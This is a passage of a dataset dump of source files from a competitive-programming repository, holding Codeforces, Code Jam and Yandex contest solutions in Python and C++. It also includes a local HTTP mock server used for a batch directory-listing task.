"content_id": "dd41f42893ff2730719e5dfcd8c802a6b035a669", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 23, "num_lines": 7, "path": "/CodeForce/0750/gen.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = 10000000 // 50 - 17\nprint(n)\nprint(\"-1 2\")\nprint(\"98 2\")\nprint(\"6 1\")\nfor i in range(n - 3):\n print(\"100 1\")\n" }, { "alpha_fraction": 0.32311320304870605, "alphanum_fraction": 0.3891509473323822, "avg_line_length": 17.434782028198242, "blob_id": "8cb763c4f5f0e34661e3ea96b3acc81e95ecd814", "content_id": "66ee96287518803e381c73889ebb579d923ab2f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 424, "license_type": "no_license", "max_line_length": 60, "num_lines": 23, "path": "/trains/train2015western/I.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nimport math\nr = int(input())\nR = r ** 2\nans = -1\nINF = 10 ** 9 + 2015\nprev = 0\nx = 0\nfor y in range(r - 1, 0, -1):\n Y = y ** 2\n while x ** 2 + Y <= R:\n x += 1\n t = y + 2 * Y\n x -= 1\n dx = x - prev\n if ans == -1:\n ans = (x * (2 * x + 1) * t) % INF\n elif dx > 0:\n ans = (ans + dx * (2 * dx + 1 + prev * 4) * t) % INF\n prev = x\nif ans == -1:\n ans = 0\nprint(ans % INF)\n" }, { "alpha_fraction": 0.5691056847572327, "alphanum_fraction": 0.5691056847572327, "avg_line_length": 23.200000762939453, "blob_id": "de7e8f407b901d74f16fc0b1f2fd9b0b21e0ab53", "content_id": "c5d53b5b5b39fd16f9a9cd5c4e57d1b40c13eac9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 123, "license_type": "no_license", "max_line_length": 45, "num_lines": 5, "path": "/trash/jv/X.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "public class X extends TemplateImpl<String> {\n void good(String s) {\n System.out.println(\"::X, \" + s);\n }\n}\n\n\n" }, { "alpha_fraction": 0.4233971834182739, "alphanum_fraction": 0.4554537832736969, "avg_line_length": 34.32352828979492, "blob_id": "a9bf760974b4bc4004df1e06159de55c4b0c756a", "content_id": "0bd67abe7a70ec60edba42d2ee631a82d16a3f76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2402, "license_type": "no_license", "max_line_length": 928, "num_lines": 68, "path": "/CodeForce/0291/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nconst int pos[] = {128, 192, 224, 240, 248, 252, 254, 255};\nint a[100001][4], ans[4];\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n // freopen(\"input.txt\", \"r\", stdin);\n int n, k;\n readln(n, k);\n for (int i = 0; i < n; i++)\n scanf(\"%d.%d.%d.%d\\n\", &a[i][0], &a[i][1], &a[i][2], &a[i][3]);\n int c = 0;\n int j = 0;\n ans[c] = pos[j];\n ans[1] = 0;\n ans[2] = 0;\n ans[3] = 0;\n set< pair< pair<int, int>, pair<int, int> > > se;\n while (true)\n {\n se.clear();\n for (int i = 0; i < n; i++)\n se.insert(make_pair(make_pair(a[i][0] & ans[0], a[i][1] & ans[1]),\n make_pair(a[i][2] & ans[2], a[i][3] & ans[3])));\n if (se.size() > k)\n {\n printf(\"-1\\n\");\n return 0;\n }\n if (se.size() == k)\n {\n printf(\"%d.%d.%d.%d\\n\", ans[0], ans[1], ans[2], ans[3]);\n return 0;\n }\n if (j == 7)\n c++,\n j = 0;\n ans[c] = pos[++j];\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.4360482692718506, "alphanum_fraction": 0.4502262473106384, "avg_line_length": 28.598215103149414, "blob_id": "fe4af1784ea0212e51a11daf7c9df4791525f6e1", "content_id": "22064dcdb98f8d2a5013d30cf338dc49b5df652b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6630, "license_type": "no_license", "max_line_length": 174, "num_lines": 224, "path": "/2022/yandexBackend/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n#include \"json.hpp\"\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//lca\nstruct lca\n{\n vector<vector<int>> g, up;\n vector<int> h;\n int n, l;\n\n lca(const vector<vector<int>>& g) //O(n * log(n))\n {\n this->g = g;\n n = SZ(g);\n l = 1;\n while ((1 << l) <= n) ++l;\n h.resize(n, -1);\n up.resize(l + 1, vector<int>(n));\n dfs(0, 0);\n fori(l)\n forj(n)\n up[i + 1][j] = up[i][up[i][j]];\n }\n \n int getParent(int u, int dist) { //O(log(n))\n fori(l)\n if (dist >> i & 1)\n u = up[i][u];\n return u;\n }\n\n void dfs(int u, int p) //O(n)\n {\n h[u] = h[p] + 1;\n up[0][u] = p;\n for (const int& v: g[u])\n if (v != p)\n dfs(v, u);\n }\n\n int get(int a, int b) //O(log(n))\n {\n if (h[a] < h[b]) swap(a, b);\n a = getParent(a, h[a] - h[b]);\n if (a == b) return a;\n ROF(i, l, 0)\n if (up[i][a] != up[i][b])\n a = up[i][a],\n b = up[i][b];\n return up[0][a];\n }\n\n int getChildWithVertex(int a, int b) //O(log(n))\n {\n if (a == b) return -1;\n return getParent(b, h[b] - h[a] - 1);\n }\n};\n\n//}}}\n\nusing json = nlohmann::json;\n\nvector<string>split(string&s,string_view d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\n\nstatic const int N = 100005;\nvoid run()\n{\n json j;\n cin >> j;\n vector<vector<int>> g(N);\n vector<map<string, int>> f(N), b(N);\n vector<bool> isChild(N);\n vector<string> labelString(N);\n vector<int> labelInt(N);\n vector<bool> label(N);\n int V = 0;\n vector<int> children;\n auto dfs = [&](auto dfs, json& u, int root) -> void {\n for (const auto& v: u.items())\n {\n g[root].pb(++V);\n f[root][v.key()] = V;\n b[V][v.key()] = root;\n if (v.value().is_object())\n dfs(dfs, v.value(), V);\n else if (!v.value().is_null())\n {\n isChild[V] = true;\n children.pb(V);\n if (v.value().is_string())\n labelString[V] = v.value();\n else\n labelInt[V] = v.value(),\n label[V] = true;\n }\n }\n };\n dfs(dfs, j, V);\n lca l(g);\n ints(q);\n fori(q)\n {\n json r;\n cin >> r;\n string p = r[\"path\"];\n int cnt = r[\"count\"];\n vector<int> ans;\n vector<string> ans2;\n\n auto x = split(p, \"*\");\n int root = 0;\n bool ok = true;\n for (auto& s: split(x[0], \".\"))\n if (s.size() && ok)\n {\n if (f[root].find(s) != f[root].end())\n root = f[root][s];\n else\n ok = false;\n }\n if (ok)\n {\n auto ss = split(x[1], \".\");\n reverse(all(ss));\n for (int C: children)\n {\n bool ok = true;\n int child = C;\n for (string& s: ss)\n if (s.size() && ok)\n {\n if (b[child].find(s) != b[child].end())\n child = b[child][s];\n else\n ok = false;\n }\n if (ok && child)\n {\n child = b[child][b[child].begin()->first];\n if (l.get(root, child) == root)\n {\n if (label[C])\n ans.pb(labelInt[C]);\n else\n ans2.pb(labelString[C]);\n }\n }\n }\n }\n sort(all(ans));\n sort(all(ans2));\n reverse(all(ans));\n reverse(all(ans2));\n json answer;\n if (ans.size() && ans2.size())\n writeln(\"{\\\"result\\\":null}\");\n else\n {\n ans.resize(min(cnt, SZ(ans)));\n ans2.resize(min(cnt, SZ(ans2)));\n if (ans.size())\n answer[\"result\"] = ans;\n else\n answer[\"result\"] = ans2;\n cout << answer << \"\\n\";\n }\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 18, "blob_id": "a3d6367da9d23927193e2f325e8ac84707719fc9", "content_id": "bd3c35534a0279e276e5fb5a86019a98f94afec4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19, "license_type": "no_license", "max_line_length": 18, "num_lines": 1, "path": "/CodeForce/1663/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "print('Red panda')\n" }, { "alpha_fraction": 0.5803201794624329, "alphanum_fraction": 0.5877725481987, "avg_line_length": 31.348215103149414, "blob_id": "f2f10b018701f39b3482454bc4f2e425ed79e299", "content_id": "19ce270279fe99a7ba62920645bb120f40932de2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7326, "license_type": "no_license", "max_line_length": 107, "num_lines": 224, "path": "/2021/yandexBackendFinal/server.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\nimport http.server as hs\nimport json\nimport sys\nimport urllib.parse\n\nclass RecordType:\n Folder = 'Folder'\n Record = 'Record'\n\n\nclass Record:\n def __init__(self, record_type, name):\n assert record_type in [RecordType.Folder, RecordType.Record]\n self.type = record_type\n self.name = name\n self.size = 1\n\n def to_dict(self):\n return {'type': self.type, 'name': self.name, 'size': self.size}\n\n\nclass Tree:\n def __init__(self, nodes_count):\n # Из индекса вершины в:\n self.graph: List[List[int]] = [[] for _ in range(nodes_count)] # В индекс ребёнка\n self.record: List[Record] = [Record(RecordType.Folder, '') for _ in range(nodes_count)] # В данные\n self.path: List[str] = ['' for _ in range(nodes_count)] # В путь\n self.depth: List[int] = [1 for _ in range(nodes_count)] # В глубину\n\n self.record[0] = Record(RecordType.Folder, '')\n self.current_ind: int = 1\n self.path_ind: Dict[str, int] = {'/': 0} # Из пути переходит в индекс вершины\n\n def add_edge(self, parent_path, child, child_type):\n parent_ind = self.path_ind[parent_path]\n self.graph[parent_ind].append(self.current_ind)\n self.record[self.current_ind] = Record(child_type, child)\n\n parent_folder = self.path[parent_ind]\n self.path[self.current_ind] = parent_folder + '/' + child\n self.path_ind[self.path[self.current_ind]] = self.current_ind\n\n self.current_ind += 1\n\n def calculate_sizes(self):\n for node in range(len(self.graph)):\n self.record[node].size = len(self.graph[node])\n for child_node in self.graph[node]:\n self.depth[child_node] = self.depth[node] + 1\n\n def validate_path(self, path):\n return path in self.path_ind\n\n def ls(self, node_ind):\n return [self.record[ind] for ind in self.graph[node_ind]]\n\n\nclass Listing:\n def __init__(self, records):\n self.records = records\n\n def to_dict(self):\n return [record.to_dict() for record in self.records]\n\n\nclass LsBatchResponse:\n def __init__(self, listings):\n self.listings = listings\n\n def to_dict(self):\n return {'listings': [listing.to_dict() for listing in self.listings]}\n\ndef is_valid_ls_batch_request(json_str):\n try:\n json_request = json.loads(json_str)\n if not isinstance(json_request, dict):\n return False\n if 'paths' not in json_request.keys():\n return False\n paths = json_request['paths']\n if not isinstance(paths, list):\n return False\n for path in paths:\n if not isinstance(path, str):\n return False\n except (TypeError, json.JSONDecodeError):\n return False\n return True\n\n\ndef read_input(file_input):\n \"\"\"\n n max_batch_size\n parent_ind name type <- (n - 1) times\n \"\"\"\n login = file_input.readline().strip()\n n, max_batch_size = map(int, file_input.readline().split())\n\n tree = Tree(n)\n for _ in range(n - 1):\n path = file_input.readline().strip()\n\n child_type = RecordType.Record\n if path[-1] == '/':\n child_type = RecordType.Folder\n path = path[:-1]\n\n path_tokens = path.split('/')\n parent_path, child_name = '/'.join(path_tokens[:-1]), path_tokens[-1]\n if parent_path == '':\n parent_path = '/'\n\n tree.add_edge(parent_path, child_name, child_type)\n tree.calculate_sizes()\n\n return login, max_batch_size, tree\n\nOK = 200\nWRONG_REQUEST = 400\nBATCH_SIZE_TOO_BIG = 429\n\nclass State:\n def __init__(self, login, max_batch_size, tree):\n self.start = False\n self.queries_left = 0\n self.login = login\n self.max_batch_size = max_batch_size\n self.tree = tree\n\nclass ServerHTTPHandler(hs.BaseHTTPRequestHandler):\n path_start_session = '/start/session?'\n path_ls_batch = '/ls/batch'\n\n def send_answer(self, code, content):\n self.send_response(code)\n self.end_headers()\n self.wfile.write(content.encode('utf-8'))\n\n def start_session(self, query):\n try:\n params = urllib.parse.parse_qs(query)\n except:\n self.send_answer(WRONG_REQUEST, 'Invalid login')\n return\n if params is None:\n self.send_answer(WRONG_REQUEST, 'Invalid login')\n return\n login = params.get('login', [])\n if len(login) != 1 or login[0] != self.state.login:\n self.send_answer(WRONG_REQUEST, 'Invalid login')\n return\n if self.state.queries_left == 0:\n self.send_answer(BATCH_SIZE_TOO_BIG, 'Amount of queries is exceeded')\n return\n self.state.queries_left -= 1\n self.state.start = True\n self.send_answer(OK, json.dumps({'max_batch_size': self.state.max_batch_size}))\n\n def ls_batch(self):\n if self.state.queries_left == 0:\n self.send_answer(BATCH_SIZE_TOO_BIG, 'Amount of queries is exceeded')\n return\n self.state.queries_left -= 1\n\n if not self.state.start:\n self.send_answer(WRONG_REQUEST, 'Session is not started')\n return\n try:\n length = int(self.headers['content-length'])\n except:\n self.send_answer(WRONG_REQUEST, 'Invalid content length')\n request = self.rfile.read(length)\n if not is_valid_ls_batch_request(request):\n self.send_answer(WRONG_REQUEST, '/ls/batch request is invalid')\n return\n\n batch = json.loads(request)['paths']\n\n total_size = 0\n ind_to_process = []\n for path in batch:\n if self.state.tree.validate_path(path):\n ind_to_process.append(self.state.tree.path_ind[path])\n total_size += self.state.tree.record[ind_to_process[-1]].size\n else:\n self.send_answer(WRONG_REQUEST, 'One of paths in batch is invalid')\n return\n if total_size > self.state.max_batch_size:\n self.send_answer(BATCH_SIZE_TOO_BIG, 'Size of a batch is bigger than max_batch_size')\n return\n\n self.send_answer(OK, json.dumps(LsBatchResponse([\n Listing([self.state.tree.record[ind] for ind in self.state.tree.graph[parent_ind]])\n for parent_ind in ind_to_process\n ]).to_dict()))\n\n def do_GET(self):\n if self.path.startswith(self.path_start_session):\n self.start_session(self.path[len(self.path_start_session):])\n else:\n self.send_error(404)\n\n def do_POST(self):\n if self.path == self.path_ls_batch or self.path.startswith(self.path_ls_batch + \"?\"):\n self.ls_batch()\n else:\n self.send_error(404)\n\n\ndef run(argv):\n login, max_batch_size, tree = read_input(open(argv[1])) # input\n state = State(login, max_batch_size, tree)\n state.queries_left = 1 + max(1, max(\n tree.depth[i] if tree.record[i].size > 0 else 0\n for i in range(len(tree.graph))))\n ServerHTTPHandler.state = state\n\n server = hs.HTTPServer(('127.0.0.1', 7777), ServerHTTPHandler)\n server.serve_forever()\n\n\nif __name__ == '__main__':\n run(sys.argv)\n" }, { "alpha_fraction": 0.35062241554260254, "alphanum_fraction": 0.3623789846897125, "avg_line_length": 22.704917907714844, "blob_id": "ee3b6103f9fbafdeb50f8d30372e9006a6cea996", "content_id": "eaefbeea4264af8fde7c3f7ffbf3fe42b59418b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2892, "license_type": "no_license", "max_line_length": 103, "num_lines": 122, "path": "/2019/yandexBackend/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nimport time\n\ndef is_op(c):\n return c == '+' or c == '-' or c == '*' or c == '/' or c == '<' or c == '>' or c == '=' or c == '?'\n\nK = int(input())\n\nS = input().split(' ')\nI = 0\nA = []\n\ndef push(x):\n global I\n global A\n A[I] = x\n I += 1\n\ndef pop():\n global I\n global A\n I -= 1\n return A[I]\n\ndef process_op(op):\n if len(op) == 0: return\n c = op[0]\n if len(op) == 1 and is_op(c):\n r = pop()\n l = pop()\n R = str(r)\n L = str(l)\n if type(l) == int and type(r) == int:\n if c == '+': push(l + r)\n if c == '-': push(l - r)\n if c == '*': push(l * r)\n if c == '/': push(0 if r == 0 else l // r)\n if c == '<': push(l < r)\n if c == '=': push(l == r)\n if c == '?':\n cmp = pop()\n if type(cmp) == bool:\n push(l if cmp else r)\n else:\n push(cmp); push(l); push(r); push('?')\n else:\n if c == '+': push(l); push(r); push('+')\n if c == '-': push(l); push(r); push('-')\n if c == '*':\n if l == 0 or r == 0:\n push(0)\n else:\n push(l); push(r); push('*')\n if c == '/': push(l); push(r); push('/')\n if c == '<': push(l); push(r); push('<')\n if c == '=': push(l); push(r); push('=')\n if c == '?':\n cmp = pop()\n if type(cmp) == bool:\n push(l if cmp else r)\n else:\n push(cmp); push(l); push(r); push('?')\n\n elif len(op) == 1 and ord(c) >= ord('a') and ord(c) <= ord('z'):\n push(op)\n else:\n push(int(op))\n\n\nA = [0] * 10 ** 5\nfor ss in S:\n process_op(ss)\n\ns = list(map(str, A[:I]))\n# print(' '.join(s))\n\ni = 0\na = []\n\ndef push(x):\n global i\n global a\n a[i] = x\n i += 1\n\ndef pop():\n global i\n global a\n i -= 1\n return a[i]\n\ndef process_op2(alpabet, op):\n if len(op) == 0: return\n c = op[0]\n if len(op) == 1 and is_op(c):\n r = pop()\n l = pop()\n if c == '+': push(l + r)\n if c == '-': push(l - r)\n if c == '*': push(l * r)\n if c == '/': push(0 if r == 0 else l // r)\n if c == '<': push(l < r)\n if c == '=': push(l == r)\n if c == '?':\n cmp = pop()\n push(l if cmp else r)\n elif len(op) == 1 and ord(c) >= ord('a') and ord(c) <= ord('z'):\n push(alphabet[ord(c) - ord('a')])\n elif len(op) == 1 and ord(c) >= ord('A') and ord(c) <= ord('Z'):\n push(alphabet[ord(c) - ord('A')])\n else:\n push(int(op))\n\n\nn = int(input())\nfor ___ in range(n):\n alphabet = list(map(int, input().split()))\n a = [0] * 10 ** 5\n i = 0\n for ss in s:\n process_op2(alphabet, ss)\n print(a[0])\n" }, { "alpha_fraction": 0.34410691261291504, "alphanum_fraction": 0.36233294010162354, "avg_line_length": 29.036497116088867, "blob_id": "7b61f6f793d2225124d18665df43fbbe0f8e2e19", "content_id": "42c0a5aa900306369d98511358e695ff0a16bd1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4115, "license_type": "no_license", "max_line_length": 928, "num_lines": 137, "path": "/2013/2013GCJ/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nchar ans[4][30] = {\"Draw\", \"X won\", \"O won\", \"Game has not completed\"};\nint field[4][4];\n\nint test()\n{\n char c;\n bool f = false;\n for (int i = 0; i < 4; i++, scanf(\"%c\", &c))\n for (int j = 0; j < 4; j++)\n {\n scanf(\"%c\", &c);\n switch (c)\n {\n case 'X' :\n field[i][j] = 1;\n break;\n case 'O' :\n field[i][j] = 2;\n break;\n case 'T' :\n field[i][j] = 3;\n break;\n default :\n field[i][j] = 0;\n f = true;\n break;\n }\n }\n scanf(\"%c\", &c);\n int j, k;\n bool ff;\n for (int i = 0; i < 4; i++)\n {\n ff = false;\n for (j = 0, k = field[i][0] == 3 ? field[i][1] : field[i][0]; j < 4; j++)\n {\n if (field[i][j] == 3)\n continue;\n if (field[i][j] != k || !field[i][j])\n {\n ff = true;\n break;\n }\n }\n if (!ff)\n return k;\n }\n for (int i = 0; i < 4; i++)\n {\n ff = false;\n for (j = 0, k = field[0][i] == 3 ? field[1][i] : field[0][i]; j < 4; j++)\n {\n if (field[j][i] == 3)\n continue;\n if (field[j][i] != k || !field[j][i])\n {\n ff = true;\n break;\n }\n }\n if (!ff)\n return k;\n }\n ff = false;\n for (j = 0, k = field[0][0] == 3 ? field[1][1] : field[0][0]; j < 4; j++)\n {\n if (field[j][j] == 3)\n continue;\n if (field[j][j] != k || !field[j][j])\n {\n ff = true;\n break;\n }\n }\n if (!ff)\n return k;\n\n ff = false;\n for (j = 0, k = field[0][3 - 0] == 3 ? field[1][3 - 1] : field[0][3 - 0]; j < 4; j++)\n {\n if (field[j][3 - j] == 3)\n continue;\n if (field[j][3 - j] != k || !field[j][3 - j])\n {\n ff = true;\n break;\n }\n }\n if (!ff)\n return k;\n\n return f ? 3 : 0;\n}\n\nint main()\n{\n freopen(\"input.in\", \"r\", stdin);\n freopen(\"output.txt\", \"w+\", stdout);\n int T;\n readln(T);\n for (int tttt = 0; tttt < T; tttt++)\n {\n printf(\"Case #%d: \", tttt + 1);\n printf(\"%s\\n\", ans[test()]);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.41329580545425415, "alphanum_fraction": 0.4277172088623047, "avg_line_length": 27.43000030517578, "blob_id": "0833625217c42e736c6720f8aa0bfd4f527af794", "content_id": "eb6d952fa5ad32590caf978cc0aa0a98914103ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2843, "license_type": "no_license", "max_line_length": 928, "num_lines": 100, "path": "/CodeForce/0292/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nint a[100002];\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &a, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n a.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n // freopen(\"input.txt\", \"r\", stdin);\n//freopen(\"output.txt\", \"w+\", stdout);\n int n, t, c, m, x, y;\n readln(n, m);\n bool f = true;\n int pos = 0;\n for (int i = 0; i < m; i++)\n {\n readln(x, y);\n a[x]++;\n a[y]++;\n if (a[x] > 2)\n if (pos == x || pos == 0)\n pos = x; else\n {\n f = false;\n break;\n }\n if (a[y] > 2)\n if (pos == y || pos == 0)\n pos = y; else\n {\n f = false;\n break;\n }\n }\n if (!f)\n {\n printf(\"unknown topology\\n\");\n return 0;\n }\n if (pos != 0)\n if (a[pos] == n - 1)\n {\n bool d = false;\n for (int j = 1; j <= n; j++)\n if (j == pos)\n continue; else\n if (a[j] != 1)\n {\n d = true;\n break;\n }\n if (d)\n printf(\"unknown topology\\n\"); else\n printf(\"star topology\\n\");\n return 0;\n }\n int count = 0;\n int s = 0;\n for (int i = 1; i <= n; i++)\n if (a[i] == 2)\n count++; else\n if (a[i] == 1)\n s++;\n if (count == n)\n {\n printf(\"ring topology\\n\");\n return 0;\n }\n if (count == n - 2 && s == 2)\n {\n printf(\"bus topology\\n\");\n return 0;\n }\n printf(\"unknown topology\\n\");\n return 0;\n}\n" }, { "alpha_fraction": 0.3632538616657257, "alphanum_fraction": 0.3913043439388275, "avg_line_length": 18.2702693939209, "blob_id": "a408364fc5850ce6b5109c53ff437f6611c9e717", "content_id": "6d1c45ff93e39f0ac949bcae5ed254336758e27d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 713, "license_type": "no_license", "max_line_length": 38, "num_lines": 37, "path": "/2020/bguirQual/O.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nimport math\n\nn = int(input())\na = list(map(int, input().split()))\ns = sum(a)\nif s % n != 0:\n print('Impossible')\n sys.exit()\n\nm = s // n\ng = sum((x - m) ** 2 for x in a)\nif g % n != 0:\n print('Impossible')\n sys.exit()\n\ng //= n\nfor (i, x) in enumerate(a):\n X = x - m\n K = g + X ** 2\n D = s + X\n c = m ** 2 + D ** 2 - K\n b = 2 * (m + D)\n d = b ** 2 - 8 * c\n if d < 0: continue\n sk = 